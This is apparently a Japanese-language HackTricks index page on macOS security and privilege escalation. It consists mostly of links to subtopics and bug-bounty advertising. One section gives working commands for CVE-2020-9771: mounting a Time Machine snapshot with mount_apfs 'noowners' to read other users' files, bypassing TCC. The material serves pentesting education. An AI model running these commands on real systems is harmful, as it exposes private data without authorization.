hacktricks/macos-hardening/macos-security-and-privilege-escalation
2023-08-16 05:18:52 +00:00
..
mac-os-architecture Translated ['backdoors/salseo.md', 'forensics/basic-forensic-methodology 2023-08-16 05:18:52 +00:00
macos-apps-inspecting-debugging-and-fuzzing Translated ['backdoors/salseo.md', 'macos-hardening/macos-red-teaming/RE 2023-08-15 18:34:02 +00:00
macos-files-folders-and-binaries Translated ['backdoors/salseo.md', 'forensics/basic-forensic-methodology 2023-08-16 05:18:52 +00:00
macos-proces-abuse Translated ['backdoors/salseo.md', 'forensics/basic-forensic-methodology 2023-08-16 05:18:52 +00:00
macos-security-protections Translated ['README.md', 'generic-methodologies-and-resources/pentesting 2023-07-31 18:31:20 +00:00
macos-applefs.md Translated to Japanese 2023-07-07 23:42:27 +00:00
macos-basic-objective-c.md Translated to Japanese 2023-07-07 23:42:27 +00:00
macos-bypassing-firewalls.md Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-07-14 14:08:38 +00:00
macos-defensive-apps.md Translated to Japanese 2023-07-07 23:42:27 +00:00
macos-dyld-hijacking-and-dyld_insert_libraries.md Translated to Japanese 2023-07-07 23:42:27 +00:00
macos-file-extension-apps.md Translated to Japanese 2023-07-07 23:42:27 +00:00
macos-protocols.md Translated to Japanese 2023-07-07 23:42:27 +00:00
macos-users.md Translated to Japanese 2023-07-07 23:42:27 +00:00
README.md Translated ['README.md', 'generic-methodologies-and-resources/pentesting 2023-07-31 18:31:20 +00:00

macOSのセキュリティと特権エスカレーション

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

HackenProofはすべての暗号バグバウンティの場所です。

遅延なしで報酬を受け取る
HackenProofのバウンティは、顧客が報酬予算を入金した後に開始されます。バグが検証された後に報酬を受け取ることができます。

Web3ペンテストの経験を積む
ブロックチェーンプロトコルとスマートコントラクトは新しいインターネットです上昇期のWeb3セキュリティをマスターしましょう。

Web3ハッカーレジェンドになる
各検証済みのバグで評判ポイントを獲得し、週間リーダーボードのトップを制覇しましょう。

HackenProofにサインアップして、ハッキングから報酬を得ましょう!

{% embed url="https://hackenproof.com/register" %}

基本的なMacOS

MacOSに慣れていない場合は、MacOSの基本を学ぶことから始めるべきです

  • 特別なMacOSのファイルと権限:

{% content-ref url="macos-files-folders-and-binaries/" %} macos-files-folders-and-binaries {% endcontent-ref %}

  • 一般的なMacOSのユーザー

{% content-ref url="macos-users.md" %} macos-users.md {% endcontent-ref %}

  • AppleFS

{% content-ref url="macos-applefs.md" %} macos-applefs.md {% endcontent-ref %}

  • カーネルのアーキテクチャ

{% content-ref url="mac-os-architecture/" %} mac-os-architecture {% endcontent-ref %}

  • 一般的なMacOSのネットワークサービスとプロトコル

{% content-ref url="macos-protocols.md" %} macos-protocols.md {% endcontent-ref %}

MacOS MDM

企業では、MacOSシステムはおそらくMDMで管理されることが多いです。したがって、攻撃者の視点からは、それがどのように機能するかを知ることが興味深いです:

{% content-ref url="../macos-red-teaming/macos-mdm/" %} macos-mdm {% endcontent-ref %}

MacOS - 検査、デバッグ、およびFuzzing

{% content-ref url="macos-apps-inspecting-debugging-and-fuzzing/" %} macos-apps-inspecting-debugging-and-fuzzing {% endcontent-ref %}

MacOSのセキュリティ保護

{% content-ref url="macos-security-protections/" %} macos-security-protections {% endcontent-ref %}

攻撃対象

ファイルの権限

rootとして実行されるプロセスがユーザーによって制御可能なファイルを書き込む場合、ユーザーはこれを悪用して特権をエスカレーションすることができます。
これは次の状況で発生する可能性があります:

  • 使用されるファイルはすでにユーザーによって作成されています(ユーザーが所有しています)
  • 使用されるファイルはグループによって書き込み可能になっています
  • 使用されるファイルはユーザーが所有するディレクトリ内にあります(ユーザーはファイルを作成できます)
  • 使用されるファイルはrootが所有するディレクトリ内にありますが、ユーザーはグループによる書き込みアクセス権を持っていますユーザーはファイルを作成できます

rootが使用するファイル作成できるようになると、ユーザーはその内容を利用したり、別の場所を指すためにシンボリックリンク/ハードリンクを作成したりすることができます。

このような脆弱性の場合、脆弱な.pkgインストーラーをチェックすることを忘れないでください:

{% content-ref url="macos-files-folders-and-binaries/macos-installers-abuse.md" %} macos-installers-abuse.md {% endcontent-ref %}

エンタイトルメントとプロセスの悪用による特権の悪用

プロセスが特権やエンタイトルメントのある別のプロセスにコードをインジェクトしたり、特権アクションを実行するためにそれに接触したりできる場合、特権をエスカレーションし、SandboxTCCなどの防御策を回避することができます。

{% content-ref url="macos-proces-abuse/" %} macos-proces-abuse {% endcontent-ref %}

ファイル拡張子とURLスキームのアプリハンドラ

ファイル拡張子によって登録された奇妙なアプリは悪用される可能性があり、異なるアプリケーションが特定のプロトコルを開くために登録されることがあります。

{% content-ref url="macos-file-extension-apps.md" %} macos-file-extension-apps.md {% endcontent-ref %}

MacOS特権エスカレーション

CVE-2020-9771 - mount_apfs TCCバイパスと特権エスカレーション

どのユーザー(特権を持たないユーザーも含む)でもタイムマシンのスナップショットを作成し、マウントし、そのスナップショットのすべてのファイルにアクセスすることができます。
必要なのは、使用されるアプリケーション(例:Terminal)がフルディスクアクセスFDAアクセスkTCCServiceSystemPolicyAllfiles)を持つために、管理者によって許可される必要があるだけです。

{% code overflow="wrap" %}

# Create snapshot
tmutil localsnapshot

# List snapshots
tmutil listlocalsnapshots /
Snapshots for disk /:
com.apple.TimeMachine.2023-05-29-001751.local

# Generate folder to mount it
cd /tmp # I didn it from this folder
mkdir /tmp/snap

# Mount it, "noowners" will mount the folder so the current user can access everything
/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap

# Access it
ls /tmp/snap/Users/admin_user # This will work

{% endcode %}

より詳しい説明は元のレポートで見つけることができます。

機密情報

{% content-ref url="macos-files-folders-and-binaries/macos-sensitive-locations.md" %} macos-sensitive-locations.md {% endcontent-ref %}

Linux Privesc

まず、Linux/Unixに影響を与える特権昇格に関するほとんどのトリックは、MacOSのマシンにも影響を与えることに注意してください。したがって、以下を参照してください:

{% content-ref url="../../linux-hardening/privilege-escalation/" %} privilege-escalation {% endcontent-ref %}

MacOSの防御アプリ

参考文献

HackenProofはすべての暗号バグバウンティの場です。

遅延なしで報酬を受け取る
HackenProofのバウンティは、顧客が報酬予算を入金した後に開始されます。バグが検証された後に報酬を受け取ることができます。

Web3ペントestingの経験を積む
ブロックチェーンプロトコルとスマートコントラクトは新しいインターネットです上昇期のweb3セキュリティをマスターしましょう。

Web3ハッカーレジェンドになる
各検証済みのバグで評判ポイントを獲得し、週間リーダーボードのトップを制覇しましょう。

HackenProofにサインアップしてハッキングから報酬を得ましょう!

{% embed url="https://hackenproof.com/register" %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥